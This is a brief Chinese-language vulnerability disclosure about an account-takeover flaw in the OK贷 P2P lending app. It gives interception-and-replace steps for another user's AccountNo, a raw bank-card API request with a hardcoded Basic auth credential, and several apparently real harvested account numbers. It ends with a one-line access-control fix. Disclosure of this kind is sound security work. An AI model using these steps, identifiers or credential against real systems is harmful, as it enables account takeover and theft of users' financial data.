P2P金融安全之OK贷APP任意用户登陆

http://android.myapp.com/myapp/detail.htm?apkName=com.okdai

测试版本2.6.4

漏洞原因，APP鉴权依靠用户的AccountNo，多接口存在越权问题

用自己的账号登陆

登陆时，抓包，修改返回体内容中的AccountNo，这边改为：ACCT10000015353

ps：有时候需要改两次，才能进行跳转

例如

这样就能进入

ACCT10000015353 的账号了。可查看用户账户各项金额

可查询用户投资记录

获取用户的银行卡相关信息

发布奶酪

有一点需要说明，连续错误三次支付密码，账号将被冻结，影响用户使用

还能到K粉圈里溜达。

进行留言，查看消息等操作

K粉圈里抓包可以看到用户的AccountNo，看上哪个登哪个。

以上，接口均可通过burpsuite暴力获取信息。

在K粉圈里收集几条AccountNo，爆给你们看

ACCT10000068930

ACCT10000086464

ACCT10000027007

ACCT10000037902

ACCT10000065312

ACCT10000022941

ACCT10000019021

HUANGLI

以获取银行卡信息为例

POST http://app.okdai.com/api/Account/BankList HTTP/1.1

Content-Length: 47

Content-Type: application/x-www-form-urlencoded

Host: app.okdai.com

Connection: Keep-Alive

Authorization: Basic TW9iaWxlQXBpS2V5OmxzQXBLV0tWYjN2U0ZSNFZvNlFBZFJJcmF3PT0=

Accept-Encoding: gzip

AccountNo=ACCT10000015353&UserPhone=13333333333

解决方案：

权限控制，加会话